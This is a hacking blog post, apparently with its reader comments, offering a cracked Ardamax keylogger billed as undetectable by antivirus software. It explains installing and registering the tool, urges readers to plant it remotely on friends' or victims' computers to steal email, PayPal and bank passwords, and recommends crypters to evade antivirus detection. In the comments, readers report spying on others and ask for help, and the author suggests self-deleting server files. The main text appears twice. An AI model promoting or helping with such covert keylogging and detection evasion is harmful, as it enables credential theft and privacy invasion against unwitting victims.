If your familiar with Key loggers then you must have surely heard about Ardamax Keylogger , Ardamax keylogger is one the best and Stable Keyloggers. For those who are new, Keylogger is a software that is installed on a Victims computer without his knowing, this Keylogger software simply keeps on recording the Key strokes typed by the victim and sends them to the hackers mailbox. No doubt, these keystrokes contain the victim’s Email passwords, Bank account details and All such important information and passwords.Thus a hacker can easily hack a victims Email, Paypal accounts and various other passwords. To know more about Keyloggers you can read my article What are Keyloggers
In one of my previous posts i gave my blog readers free Ardmax key logger V3,which is outdated now and is easily detected by almost all Anti viruses, So Today i have decided to give my readers New Full version Ardamax Keylogger(V3.8.5) which is FUD (fully undetectable by anti-viruses ) absoluley free
Ardamax Keylogger (V3.8.5) Full Version - Free Download
Follow the steps given bellow to download Ardamax Keylogger
1. Download Ardamax Keylogger From Here & And download the Password from Here
2. After extracting the files, click run and Follow the pics to install Ardamax Keylogger
3. After Installing, you should see Ardamax keylogger icon on your tray .Right click on it and select registration key , Enter the user name and the key provided by me ( see Key.txt )
That's it You have successfully installed The latest Full version of Ardamax keylogger , Now you can install the keylogger remotely on your friends/victims PC and start hacking their passwords
To install ardamax keylogger remotely on victims computer .You can read my Previous article How To Hack a Remote Computer Using Ardamax Keylogger
AV Scan Result :
As you can see only few Anti viruses detected this keylogger server file as Virus . Especially Avast dint pick this one as a virus. Avast is the most used antivirus software around the world ,So you can be sure that you can hack at least a few of your friends email passwords ,You can also use a crypter to increase Keyloggers FUD ( fully undetectable by anti-viruses) For more information on Crypters You can read my article "Crypter Software To Bypass Antivirus Detection "
If you have any doubts regarding the article , Please feel free to post a comment
In one of my previous posts i gave my blog readers free Ardmax key logger V3,which is outdated now and is easily detected by almost all Anti viruses, So Today i have decided to give my readers New Full version Ardamax Keylogger(V3.8.5) which is FUD (fully undetectable by anti-viruses ) absoluley free
Ardamax Keylogger (V3.8.5) Full Version - Free Download
Follow the steps given bellow to download Ardamax Keylogger
1. Download Ardamax Keylogger From Here & And download the Password from Here
2. After extracting the files, click run and Follow the pics to install Ardamax Keylogger
3. After Installing, you should see Ardamax keylogger icon on your tray .Right click on it and select registration key , Enter the user name and the key provided by me ( see Key.txt )
That's it You have successfully installed The latest Full version of Ardamax keylogger , Now you can install the keylogger remotely on your friends/victims PC and start hacking their passwords
To install ardamax keylogger remotely on victims computer .You can read my Previous article How To Hack a Remote Computer Using Ardamax Keylogger
AV Scan Result :
As you can see only few Anti viruses detected this keylogger server file as Virus . Especially Avast dint pick this one as a virus. Avast is the most used antivirus software around the world ,So you can be sure that you can hack at least a few of your friends email passwords ,You can also use a crypter to increase Keyloggers FUD ( fully undetectable by anti-viruses) For more information on Crypters You can read my article "Crypter Software To Bypass Antivirus Detection "
Note :-
We also recommend you to use – Winspy keylogger or Sniperspy which are FUD for life time (Fully Undetectable by antivirus ).
If you have any doubts regarding the article , Please feel free to post a comment
ardamax i installed it and ok the antivirus dont detect it but when i create the .exe with the sript it didint work the antivirus instantly erase it maybe im doing something wrong or the binder its the bad thing
Use FUD Free Crypter To bypass Antivirus Detection
Hey john can you please tell me
REPLYwhy my keylogger keeps saying this when i open the log viewer "log viewer not installed" always :[ i keep reinstalling after 1 hour it keep saying that when i open the log :[[ please really i need your help
@Francis M.
If this keylogger is not working for you means then Please use rinlogger (keylogger)
where is key.txt for registration
REPLYdear sir m using it...but i want ardamx 3.8.7 full download
REPLYnd another prob is ...after some time view log ....i got msg ...(logviewr is not installd)
plz tell me wt i do..
john how can i remove the keylogger installed it when i created a remote installation package
REPLYhow ?
its saying viewlog not installed....
REPLYwhwn iam trying to uninstall ardamax.it asking for username@password....help me
@Francis M.
You must remove it manually ,there are many ways by which u can remove it , i will be writing a tut on that so keep visiting
I installed the program but avast popped up 2 viruses. Something about the okj.exe and some other one cant remember which
REPLYYes I also got Virus warning from Avast... Is there any other undetectable keyloggers (free)
REPLYKeylogger software is very useful for us and i have seen these all pictures that you have published over here with help of this we can install keylogger with best way.
REPLYHi my problem is when i send the exe file to my friend or other person the screen & webcam shots are there but not keystroke & 1 more thing that is log are coming on few day like 1 or 2 and can't sends a log after 2 days help me.
REPLYAbe tum sab ke sab fas gaye ho isne tumhe keylogger install karwa liya h tumhare system me ab ye tum sabke password dekh lega koi b is software ko install mat karna...
REPLYwhats the password to pen the file so you can install it
whats the rejisteration key???
REPLYand rejisteration name????
the registration key didnt work
REPLYit gvae me an error
nevermind, i got it to work
REPLYits actually flawless
if you have an antivirus software on the computer you are downloading and such to(not sending to) then you have to set an exception for the files
hyyyyyyy john this keylogger is dected by NPAV and quickheal..So what can i doooooo..please help me
REPLYWhat is the registration key
REPLYAnd registration user name
I installed the software but i cant see any icon for this software in the system tray! Even Folder OKJ from Program Files does'nt have the icon. Using Win 7.
REPLYhi sir /
REPLYAfter extracting these files i could not get the exe file for setup how can i get it?
when i try too install it it tells me i have to donload the latest version and takes me to ardamax site why?
REPLYcould u plz providing me an symbian(NOKIA) keylogger?
REPLYthx nyway
Hi John, the installation file no longer works as it asks you to download the latest version and then sends you to the website. Any chance you can fix this?
It says download Ardamax 4.0
REPLYis the seial works?
can I know if I can attack with this on mac!?
REPLYis there any method to replace the installed server file on victims computer with new server file.
REPLY@Amol Prakash
No but you can create a self destruction server file like say delete after 2 weeks
Hi. I got this combination of keys and I can't figure it out to copy it identically.
"HORAIUHA89YU" doesn't work.
it says that i must download the latest version, why ?
REPLYSomeone have the new serial number and registration key for the latest version?
@John I Succesfully Installed Keylogger on Remote System but After 5-6 Logs Keylogger is Not Sending Me Any more Logs Please Help me!
REPLYhow to uninstall the keylogger in the add / remove program is not in the start menu also no
REPLYthe usename and serialnumber is invalid!!! what is the correct one...please inform
REPLYserial key file not download , can u please email me ,,, jq.baloch@gmail.com
REPLYwhen i downloaded it . it says please download latest version which needs to be bought
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